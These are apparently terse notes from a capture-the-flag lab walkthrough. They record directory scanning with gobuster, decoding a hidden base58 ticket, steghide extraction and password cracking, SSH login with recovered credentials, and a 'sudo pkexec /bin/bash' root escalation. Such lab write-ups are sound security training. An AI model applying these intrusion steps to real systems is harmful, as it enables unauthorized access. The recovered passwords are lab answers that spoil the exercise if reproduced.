export ip=10.10.73.0


scan nmap {nmap -sC -sV -oN nmap/initial $ip}

scan gobuster {gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}

/island (Status: 301)

{source || vigilante || #hidden}


gobuster dir -u $ip/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/2100 


gobuster dir -u $ip/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket


/green_arrow.ticket (Status: 200)


RTy8yhBQdscX {base 58}
!#th3h00d



user from ftp cd .. {slade}

extract aa.jpg {steghide}
crack password {stegcracker}

shado {M3tahuman}


ssh slade@ip
M3tahuman


cat user.txt


sudo -l


sudo pkexec /bin/bash


cat root.txt

















